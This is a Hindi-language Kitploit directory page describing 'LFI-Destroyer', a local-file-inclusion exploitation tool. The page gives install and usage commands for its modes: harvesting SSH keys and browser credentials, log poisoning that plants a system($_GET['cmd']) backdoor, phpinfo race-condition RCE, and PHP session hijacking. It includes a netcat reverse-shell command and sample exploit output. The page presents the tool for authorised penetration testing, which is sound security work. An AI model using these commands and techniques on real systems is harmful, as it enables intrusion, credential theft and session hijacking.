Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
LFI-Destruction — यह प्रोग्राम आपसे लोकल फाइल इन्क्लूजन (Local File Inclusion) की जानकारी मांगता है और स्वचालित रूप से /etc/passwd फ़ाइल को खोजता है, और मिले उपयोगकर्ता नामों का उपयोग करके किसी भी SSH कुंजी या कुंजियों के प्रकार को स्थानीय कंप्यूटर पर खोजकर डाउनलोड करता है। यह प्रोग्राम CVE-2021-41773_ apache2.4.49 और 50 ट्रैवर्सल पथ एक्सप्लॉइट भी निष्पादित करता है। इसके अलावा अन्य LFI कमजोरियों के लिए भी काम करता है। | Kitploit
उपकरण/GitHubGitHub/revshellxd
/
lfi-destruction
विशेषाधिकार वृद्धिटोहीपासवर्ड हमलेपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubrevshellxd/lfi-destruction

LFI-Destruction

रिपॉजिटरी देखें
46 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह प्रोग्राम आपसे लोकल फाइल इन्क्लूजन (Local File Inclusion) की जानकारी मांगता है और स्वचालित रूप से /etc/passwd फ़ाइल को खोजता है, और मिले उपयोगकर्ता नामों का उपयोग करके किसी भी SSH कुंजी या कुंजियों के प्रकार को स्थानीय कंप्यूटर पर खोजकर डाउनलोड करता है। यह प्रोग्राम CVE-2021-41773_ apache2.4.49 और 50 ट्रैवर्सल पथ एक्सप्लॉइट भी निष्पादित करता है। इसके अलावा अन्य LFI कमजोरियों के लिए भी काम करता है।

साझा करें

🔥 LFI-Destruction – अधिकृत पेनिट्रेशन टेस्टिंग फ्रेमवर्क LFI-Destroyer एक व्यापक, मॉड्यूलर स्थानीय फ़ाइल समावेशन (LFI) शोषण फ्रेमवर्क है जो अधिकृत सुरक्षा पेशेवरों के लिए डिज़ाइन किया गया है। यह कई आक्रमण तकनीकों को एक ही उपयोग में आसान टूल में जोड़ता है:

  • SSH और ब्राउज़र आर्टिफैक्ट फ़ज़िंग – Linux और Windows पर SSH कुंजियों, Putty PPK, WinSCP, FileZilla, Firefox, Chrome, Edge और Brave क्रेडेंशियल्स की खोज करें।
  • लॉग पॉइज़निंग → रिवर्स शेल – कस्टम पेलोड समर्थन के साथ लिखने योग्य लॉग फ़ाइलों के माध्यम से स्वचालित RCE।
  • phpinfo() रेस कंडीशन RCE – जब file_uploads=On और phpinfo() सुलभ हो, तो पूरी तरह से स्वचालित LFI2RCE।
  • अपलोड की गई फ़ाइल ट्रिगर – LFI के माध्यम से पहले से अपलोड किए गए PHP शेल को शामिल और निष्पादित करें।
  • PHP सत्र गणना – हाइजैकिंग के लिए सत्र फ़ाइलों को डाउनलोड और डीकोड करें।

LFI-OSCP.py OSCP परीक्षा के लिए सुरक्षित संस्करण है जिसमें 0 ऑटो एक्सप्लॉइट हैं। यह मूल रूप से एक बहुत ही सुंदर फ़ज़र है जो एक्सप्लॉइट की पुष्टि करने पर मैन्युअल निर्देश प्रिंट करता है कि एक्सप्लॉइट कैसे करें।

⚠️ कानूनी अस्वीकरण यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इसे उपयोग करने से पहले आपके पास सिस्टम स्वामी से स्पष्ट लिखित अनुमति होनी चाहिए। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेता है।

📦 स्थापना

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/RevShellXD/LFI-Destroyer.git
cd LFI-Destroyer

# 2. Install dependencies (only colorama is required; others are optional)
pip install colorama

# 3. Make the main script executable
chmod +x LFI-Destroyer.py

🚀 त्वरित प्रारंभ – मोड 1 (SSH / ब्राउज़र आर्टिफैक्ट फ़ज़िंग)

root@kitploit:~
python3 LFI-Destroyer.py

Linux या Windows चुनें।

📂 निर्देशिका संरचना

root@kitploit:~
LFI-Destruction/
LFI-Destruction.py          

modes/__init__.py ,mode3_phpinfo_race.py, mode4_upload_trigger.py, mode5_session_grabber.py           

artifacts/               

README.md

आक्रमण मोड 1 चुनें। अपने LFI एंडपॉइंट को कॉन्फ़िगर करने के लिए संकेतों का पालन करें। स्क्रिप्ट स्वचालित रूप से उपयोगकर्ताओं की गणना करेगी, अस्तित्व सत्यापित करेगी (Windows NTUSER.DAT बीकन का उपयोग करता है), और SSH कुंजियों, ब्राउज़र क्रेडेंशियल्स और अन्य संवेदनशील फ़ाइलों के लिए पुनरावर्ती रूप से फ़ज़ करेगी। सभी आर्टिफैक्ट ./artifacts/ निर्देशिका में सहेजे जाते हैं।

📝 मोड 2 – लॉग पॉइज़निंग और रिवर्स शेल

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua

या इंटरैक्टिव रूप से चलाएँ और मोड 2 चुनें।

क्या होता है:

  • User‑Agent (या आपके चुने हुए वेक्टर) के माध्यम से PHP परीक्षण पेलोड इंजेक्ट करता है।
  • सामान्य लॉग फ़ाइलों (Apache, Nginx, SSH, सिस्टम लॉग, Windows पर XAMPP/WAMP/IIS) को शामिल करने का प्रयास करता है।
  • यदि एक लिखने योग्य लॉग मिलता है, तो एक स्थायी system($_GET['cmd']) बैकडोर इंजेक्ट करता है।
  • id (Linux) या whoami (Windows) के साथ RCE की पुष्टि करता है।
  • रिवर्स शेल लिसनर के लिए संकेत देता है और bash (Linux) या PowerShell (Windows) रिवर्स शेल प्रदान करता है।

कस्टम रिवर्स शेल:

root@kitploit:~
python3 LFI-Destroyer.py --log-poisoning --log-vector ua --custom-shell "nc {lhost} {lport} -e /bin/bash"

प्लेसहोल्डर्स {lhost} और {lport} आपके लिसनर IP/पोर्ट से बदल दिए जाएंगे।

🧪 BETA – मोड 3: phpinfo() रेस कंडीशन RCE स्थिति: Beta – गलत कॉन्फ़िगर किए गए PHP सर्वरों पर file_uploads=On और सुलभ phpinfo() के साथ विश्वसनीय रूप से काम करता है।

पूर्वापेक्षाएँ:

  • file_uploads = On (स्वचालित रूप से पता लगाया गया)
  • post_max_size ≥ upload_max_filesize (स्वचालित रूप से पता लगाया गया)
  • LFI भेद्यता
  • phpinfo() पेज तक पहुंच (स्क्रिप्ट सामान्य स्थानों को ब्रूट-फ़ोर्स करती है)

चलाएँ:

root@kitploit:~
python3 LFI-Destroyer.py
# मोड 3 चुनें

सामान्य रूप से LFI विवरण प्रदान करें। स्क्रिप्ट करेगी:

  • phpinfo() को ब्रूटफ़ोर्स करना (OS-विशिष्ट वर्डलिस्ट)
  • upload_max_filesize और post_max_size को पार्स करना
  • रेस कंडीशन आक्रमण को निष्पादित करना (अपलोड + LFI)
  • RCE की पुष्टि करना
  • रिवर्स शेल प्रदान करना उदाहरण आउटपुट:
root@kitploit:~
[*] Bruteforcing phpinfo.php (45 paths) ...
[+] Found phpinfo.php at http://192.168.1.100/phpinfo.php
[+] file_uploads=On (max size: 8M)
[+] Attempt race condition RCE? (y/N): y
[*] Race attempt 1/3 ...
[+] Extracted temporary file path: /tmp/phpABC123
[+] RCE confirmed via temporary file!
[!] LOG POISONING SUCCESSFUL! Ready to escalate to reverse shell.

🧪 BETA – मोड 4: अपलोड की गई फ़ाइल ट्रिगर स्थिति: Beta – मानता है कि आप पहले ही PHP शेल अपलोड कर चुके हैं (जैसे, किसी अन्य भेद्यता या मैन्युअल अपलोड के माध्यम से)। फिर स्क्रिप्ट इसे शामिल करने और कमांड निष्पादित करने के लिए LFI का उपयोग करती है।

दो ऑपरेशन मोड:

  • सटीक पथ – आप जानते हैं कि फ़ाइल कहाँ है (जैसे, uploads/shell.php)।
  • ब्रूट-फ़ोर्स – स्क्रिप्ट को सामान्य अपलोड निर्देशिकाओं + फ़ाइलनामों को आज़माने दें।

चलाएँ:

root@kitploit:~
python3 LFI-Destroyer.py
# मोड 4 चुनें

पथ या 'brute' दर्ज करें। स्क्रिप्ट करेगी:

  • ?cmd=whoami के साथ LFI समावेशन का प्रयास करना
  • यदि सफल होता है, तो आउटपुट दिखाना और रिवर्स शेल प्रदान करना उदाहरण:
root@kitploit:~
Enter path to uploaded file (relative to web root), or 'brute' to try common locations: uploads/shell.php
[*] Trying uploads/shell.php ...
[+] SUCCESS! Shell executed at uploads/shell.php
[+] Command output:
www-data
Attempt reverse shell? (y/N): y

🧪 BETA – मोड 5: PHP सत्र गणना और हाइजैकिंग स्थिति: Beta – session.save_path (phpinfo() या फ़ॉलबैक वर्डलिस्ट के माध्यम से निर्धारित) से सत्र फ़ाइलें पढ़ता है, उन्हें सहेजता है, और आवश्यक होने पर base64 डिकोडिंग का प्रयास करता है।

चलाएँ:

root@kitploit:~
python3 LFI-Destroyer.py
# मोड 5 चुनें

सत्र आईडी या गणना के लिए 'list' दर्ज करें। उदाहरण:

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: abc123
[*] Reading /var/lib/php/sessions/sess_abc123 ...
[+] Session file retrieved!
[--- SESSION DATA (raw) ---]
username|s:5:"admin";user_id|i:1;

सत्र निर्देशिका सूची (यदि निर्देशिका अनुक्रमण सक्षम है):

root@kitploit:~
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: list
[+] Found 12 session files:
  - sess_abc123
  - sess_def456
  ...

सभी सत्र फ़ाइलें artifacts/session_* में सहेजी जाती हैं। यदि डेटा base64-एन्कोडेड प्रतीत होता है, तो स्क्रिप्ट स्वचालित रूप से php://filter/convert.base64-decode बाइपास का प्रयास करती है और एक डिकोडेड संस्करण सहेजती है।

🧠 उन्नत मोड (-adv) अतिरिक्त LFI तकनीकों को सक्षम करें:

  • POST पैरामीटर LFI
  • कुकी/हेडर LFI
  • PHP रैपर (php://filter, data://, expect://)
  • आर्टिफैक्ट फ़ज़िंग के लिए कस्टम वर्डलिस्ट
  • ऑटो-डेप्थ डिटेक्शन
root@kitploit:~
python3 LFI-Destroyer.py -adv

⚙️ कमांड-लाइन फ़्लैग

फ़्लैगविवरण
--os {linux,windows}लक्ष्य OS बलपूर्वक सेट करें
--auto-depthट्रैवर्सल गहराई स्वचालित रूप से पता लगाएं
--wordlist FILEकस्टम फ़ाइल पथ वर्डलिस्ट (OS डिफ़ॉल्ट को ओवरराइड करता है)
--userlist FILEकस्टम Windows उपयोगकर्ता नाम (मोड 1)
--beacon-file PATHकस्टम बीकन फ़ाइल (डिफ़ॉल्ट: NTUSER.DAT)
--custom-shell CMDकस्टम रिवर्स शेल कमांड ({lhost} और {lport} का उपयोग करें)
--log-poisoningCLI से मोड 2 सक्षम करें (कोई इंटरैक्टिव मोड चयन नहीं)
--log-vector {ua,referer,xff,header,param}लॉग पॉइज़निंग के लिए इंजेक्शन वेक्टर
--log-header NAMEकस्टम हेडर नाम (वेक्टर=header के लिए)
--log-param NAMEकस्टम पैरामीटर नाम (वेक्टर=param के लिए)
--log-files FILEकस्टम लॉग पथ सूची
--rce-command CMDRCE सत्यापन के लिए परीक्षण कमांड
--proxy URLHTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080)
--rate FLOATअनुरोधों के बीच देरी (सेकंड)
--output FILEपरिणाम JSON में सहेजें
--dry-runकॉन्फ़िगरेशन का परीक्षण करें – कोई अनुरोध नहीं भेजा गया
--no-colorरंगीन आउटपुट अक्षम करें

मोड 3, 4 और 5 को modes/ निर्देशिका से गतिशील रूप से लोड किया जाता है। आप run(config, fuzzer) फ़ंक्शन के साथ एक Python फ़ाइल डालकर आसानी से नए मोड जोड़ सकते हैं।

🧰 आवश्यकताएँ

  • Python 3.8+
  • colorama (वैकल्पिक, रंगीन आउटपुट के लिए)
  • कोई अन्य निर्भरता नहीं – स्क्रिप्ट केवल मानक पुस्तकालय का उपयोग करती है।

📜 लाइसेंस और लेखक RevShellXD द्वारा लिखित MIT लाइसेंस के तहत लाइसेंस प्राप्त – अधिकृत सुरक्षा पेशेवरों के लिए निःशुल्क।

केवल शैक्षिक और अधिकृत परीक्षण के लिए। यदि आप इस टूल के साथ कानून तोड़ते हैं, तो आप पूरी तरह से जिम्मेदार हैं।

⭐ स्टार और योगदान करें यदि आपको यह टूल उपयोगी लगता है, तो कृपया GitHub पर रिपॉजिटरी को स्टार करें। पुल रिक्वेस्ट और नए मोड योगदान का स्वागत है – modes/init.py में सरल मॉड्यूल इंटरफ़ेस का पालन करें।

टूल डाउनलोड करें